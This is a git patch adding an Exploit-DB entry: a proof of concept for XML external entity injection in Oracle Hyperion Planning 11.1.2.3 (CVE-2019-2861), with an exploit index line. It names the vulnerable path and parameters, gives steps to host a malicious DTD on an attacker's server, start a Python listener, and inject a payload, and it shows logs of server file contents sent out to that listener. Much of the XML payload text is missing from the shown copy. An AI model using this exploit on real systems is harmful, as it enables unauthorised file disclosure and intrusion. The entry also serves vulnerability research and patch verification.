From 50dee4d76905549065802f413243670096232bf9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 1 Aug 2019 05:02:17 +0000 Subject: [PATCH] DB: 2019-08-01 1 changes to exploits/shellcodes Oracle Hyperion Planning 11.1.2.3 - XML External Entity --- exploits/multiple/webapps/47196.txt | 53 +++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 54 insertions(+) create mode 100644 exploits/multiple/webapps/47196.txt diff --git a/exploits/multiple/webapps/47196.txt b/exploits/multiple/webapps/47196.txt new file mode 100644 index 000000000..0a8a4f685 --- /dev/null +++ b/exploits/multiple/webapps/47196.txt @@ -0,0 +1,53 @@ +- Exploit Title: XXE Injection Oracle Hyperion +- Exploit Author: Lucas Dinucci (idntk.lucdin@gmail.com) +- Twitter: @identik1t +- Vendor Homepage: https://www.oracle.com/applications/performance-management +- Date: 02/11/2019 +- Affected Product: Oracle Hyperion Enterprise Performance Management System +- Version: 11.1.2.3 +- CVE: CVE-2019-2861 +- Patch: https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html +- Vulnerability Type: https://cwe.mitre.org/data/definitions/611.html + + +# XML External Entity (XXE) Injection + + +The event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo parameters are prone to XXE injection. An authenticated attacker could exploit this vulnerability to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution and denial of service attacks. + +Path: http://host:19000/calcmgr/faces/cmshell?_adf.ctrl-state=i38w0cig2_4 + +Parameters: event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo (POST REQUEST) + + +# Proof-of-concept + + +1 - Create a file and name it as xxe_poc with the following content, replacing with your server address: + + + +"> + + +2 - Start a webserver to receive the connection, such as: + + +sudo python -m SimpleHTTPServer 80 + + +3 - Place the following payload in one of the vulnerable parameters, replacing with your server address: + + + %pe; %param1; %external;]>action + + +4 - Data retrivial: + +Serving HTTP on 0.0.0.0 port 8000 ... + +192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /xxe_poc HTTP/1.1" 200 - + +192.168.13.1 - - [11/Feb/2019 04:59:47] code 404, message File not found + +192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /log?data=; HTTP/1.1" 200 -;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files] HTTP/1.1" 400 - \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5a88c6797..6afefed2a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41568,3 +41568,4 @@ id,file,description,date,author,type,platform,port 47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware, +47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,